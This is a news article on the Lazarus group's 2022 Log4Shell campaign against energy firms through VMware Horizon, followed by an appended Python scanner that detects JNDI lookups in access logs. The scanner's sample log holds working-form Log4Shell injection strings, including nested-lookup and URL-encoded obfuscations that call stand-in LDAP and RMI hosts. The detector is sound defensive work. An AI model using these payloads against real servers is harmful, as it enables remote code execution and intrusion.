According to Cisco Talos, APT38 targets VMware Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.

North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada.

APT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist, the biggest cryptocurrency theft in history, in April 2022. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities.

The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. According to threat research firm Cisco Talos, APT38’s campaign was active until July this year.

Lazarus established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j. However, it seems there are still systems that have not been patched yet.

“The Log4j exploit used in these attacks has been known, and called critical, for over a year. In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks. “This poses a huge threat to some of the most critical systems within the critical infrastructure space.”

In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. CSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws.

Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. The company clarified that Symantec and South Korea’s AhnLab previously detailed the campaign but Lazarus has updated its M.O., evident from the use of MagicRAT.
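As an added example (not code from the article, Cisco Talos, or CISA), a small Python scanner that flags Log4Shell-style `${jndi:...}` lookups in web access logs of the kind an internet-facing Horizon deployment produces, including URL-encoded and nested-lookup obfuscations that a plain substring match misses. The log lines, request paths and IP addresses below are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (documentation IPs, invented paths): one benign
# request, a plain JNDI lookup in the User-Agent, a nested-lookup obfuscation,
# a URL-encoded lookup in the query string, and a harmless ${date:...} lookup.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Sep/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Sep/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.4 - - [01/Sep/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:N}${::-d}${env:X:-i}:ldap://198.51.100.8/x}"
198.51.100.4 - - [01/Sep/2022:10:00:04 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.8%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.10 - - [01/Sep/2022:10:00:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "report ${date:yyyy} text"
"""

# Innermost lookups that resolve to a single character: ${lower:c}, ${upper:c},
# and default-value forms such as ${::-c} or ${env:NOPE:-c}.
_CHAR_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}])\}|\$\{[^${}]*:-([^${}])\}", re.IGNORECASE
)
# Canonical JNDI lookup with the schemes Log4j's JndiLookup can resolve.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested one-character lookups until stable.
    Bounded so a hostile line cannot keep the loop busy indefinitely."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CHAR_LOOKUP.sub(lambda m: (m.group(1) or m.group(2)).lower(), text)
        if new == text:
            break
        text = new
    return text


def scan_log(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, scheme, client_ip) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((lineno, match.group(1).lower(), line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for lineno, scheme, ip in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} from {ip}")
```

A hit only shows that a lookup string reached the logger; whether it resolved depends on the Log4j version and JndiLookup configuration on that host, so each hit still needs triage against the patch state of the server.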